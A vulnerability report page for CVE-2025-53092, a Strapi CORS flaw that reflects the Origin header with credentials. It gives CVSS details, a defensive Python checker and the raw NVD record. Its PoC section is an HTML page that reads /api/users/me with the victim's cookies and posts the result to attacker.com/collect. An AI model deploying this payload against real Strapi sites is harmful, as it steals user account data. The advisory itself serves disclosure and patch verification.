Security Vulnerability Report
CVE-2025-53092 (CVSS 6.5, MEDIUM)

Published: 2025-10-16 17:15:34
Last Modified: 2025-11-25 18:44:29

Description

Strapi is an open source headless content management system. Strapi versions prior to 5.20.0 contain a CORS misconfiguration vulnerability in default installations. By default, Strapi reflects the value of the Origin header back in the Access-Control-Allow-Origin response header without proper validation or whitelisting. This allows an attacker-controlled site to send credentialed requests to the Strapi backend. An attacker can exploit this by hosting a malicious site on a different origin (e.g., different port) and sending requests with credentials to the Strapi API. The vulnerability is fixed in version 5.20.0. No known workarounds exist.
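As an added check that is not part of this report or of Strapi's own code: the script below classifies the CORS headers a Strapi instance you operate returns to a request carrying an unlisted Origin, so the reflection described above can be confirmed fixed after upgrading to 5.20.0. The probe origin, hostnames and sample headers are constructed values.

```python
import urllib.error
import urllib.request
from typing import Mapping

# Origin used for the probe: a constructed value that no real allowlist
# should contain, so an echo of it can only mean reflection.
PROBE_ORIGIN = "https://cors-probe.example"


def classify_cors(probe_origin: str, headers: Mapping[str, str]) -> str:
    """Classify a response to a request that carried Origin: probe_origin.
    'reflected-with-credentials' is the CVE-2025-53092 condition: the probe
    origin is echoed back and Access-Control-Allow-Credentials is true."""
    # Header names are case-insensitive; normalise before lookup.
    h = {k.lower(): v.strip() for k, v in headers.items()}
    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").lower() == "true"
    if acao is None:
        return "no-cors"          # no CORS headers at all
    if acao == "*":
        return "wildcard"         # browsers refuse credentials with '*'
    if acao == probe_origin:
        return "reflected-with-credentials" if creds else "reflected"
    return "allowlisted"          # a fixed origin that is not ours


def probe(url: str, probe_origin: str = PROBE_ORIGIN) -> str:
    """One GET with an Origin header against an instance you operate.
    4xx/5xx answers (e.g. 401 from /api/users/me) still carry CORS headers."""
    req = urllib.request.Request(url, headers={"Origin": probe_origin})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return classify_cors(probe_origin, resp.headers)
    except urllib.error.HTTPError as err:
        return classify_cors(probe_origin, err.headers)


if __name__ == "__main__":
    # Constructed sample responses, not captured from a real Strapi server.
    vulnerable = {"Access-Control-Allow-Origin": PROBE_ORIGIN,
                  "Access-Control-Allow-Credentials": "true"}
    fixed = {"Access-Control-Allow-Origin": "https://admin.example",
             "Access-Control-Allow-Credentials": "true"}
    print(classify_cors(PROBE_ORIGIN, vulnerable))  # reflected-with-credentials
    print(classify_cors(PROBE_ORIGIN, fixed))       # allowlisted
```

Run probe() against your own deployment's API endpoint; "reflected-with-credentials" is exactly the condition this CVE describes, while "allowlisted" or "no-cors" indicates the patched behaviour.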

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:* - VULNERABLE
Strapi < 5.20.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```html
<!-- CORS Misconfiguration Exploit PoC for CVE-2025-53092 -->
<!-- Save as attacker.html and host on a different origin (e.g., different port) -->
<!-- Target: Strapi instance running on http://victim-strapi.com:1337 -->
<!DOCTYPE html>
<html>
<head>
  <title>CVE-2025-53092 PoC</title>
</head>
<body>
  <h1>CORS Misconfiguration Exploit</h1>
  <div id="result"></div>
  <script>
    // Target Strapi API endpoint
    const targetURL = 'http://victim-strapi.com:1337/api/users/me';

    // Step 1: Create XMLHttpRequest with credentials
    const xhr = new XMLHttpRequest();
    xhr.open('GET', targetURL, true);
    xhr.withCredentials = true; // Send cookies/credentials with the request

    // Step 2: Define callback to handle response
    xhr.onreadystatechange = function() {
      if (xhr.readyState === 4) {
        if (xhr.status === 200) {
          // Step 3: Exfiltrate stolen data to attacker server
          const stolenData = xhr.responseText;
          document.getElementById('result').innerText = 'Exploited: ' + stolenData;
          // Send stolen data to attacker's collection server
          fetch('http://attacker.com/collect', {
            method: 'POST',
            body: JSON.stringify({ data: stolenData })
          });
        } else {
          document.getElementById('result').innerText = 'Status: ' + xhr.status;
        }
      }
    };

    // Step 4: Send the cross-origin request
    xhr.send();

    // Alternative using fetch API
    /*
    fetch(targetURL, {
      method: 'GET',
      credentials: 'include', // Include cookies
      headers: { 'Content-Type': 'application/json' }
    })
    .then(response => response.json())
    .then(data => {
      console.log('Stolen data:', data);
      // Exfiltrate to attacker server
      fetch('http://attacker.com/collect', {
        method: 'POST',
        body: JSON.stringify(data)
      });
    })
    .catch(error => console.error('Error:', error));
    */
  </script>
</body>
</html>
```

References

https://github.com/strapi/strapi/security/advisories/GHSA-9329-mxxw-qwf8 (Vendor Advisory)

Raw JSON Data

```json
{"cve": {
  "id": "CVE-2025-53092",
  "sourceIdentifier": "[email protected]",
  "published": "2025-10-16T17:15:33.727",
  "lastModified": "2025-11-25T18:44:29.403",
  "vulnStatus": "Analyzed",
  "cveTags": [],
  "descriptions": [{"lang": "en", "value": "Strapi is an open source headless content management system. Strapi versions prior to 5.20.0 contain a CORS misconfiguration vulnerability in default installations. By default, Strapi reflects the value of the Origin header back in the Access-Control-Allow-Origin response header without proper validation or whitelisting. This allows an attacker-controlled site to send credentialed requests to the Strapi backend. An attacker can exploit this by hosting a malicious site on a different origin (e.g., different port) and sending requests with credentials to the Strapi API. The vulnerability is fixed in version 5.20.0. No known workarounds exist."}],
  "metrics": {"cvssMetricV31": [{
    "source": "[email protected]",
    "type": "Secondary",
    "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"},
    "exploitabilityScore": 2.8,
    "impactScore": 3.6
  }]},
  "weaknesses": [{
    "source": "[email protected]",
    "type": "Secondary",
    "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-364"}, {"lang": "en", "value": "CWE-942"}]
  }],
  "configurations": [{"nodes": [{
    "operator": "OR",
    "negate": false,
    "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.20.0", "matchCriteriaId": "4129AF63-8F53-43D6-8E8E-DB0FB979FF0D"}]
  }]}],
  "references": [{"url": "https://github.com/strapi/strapi/security/advisories/GHSA-9329-mxxw-qwf8", "source": "[email protected]", "tags": ["Vendor Advisory"]}]
}}
```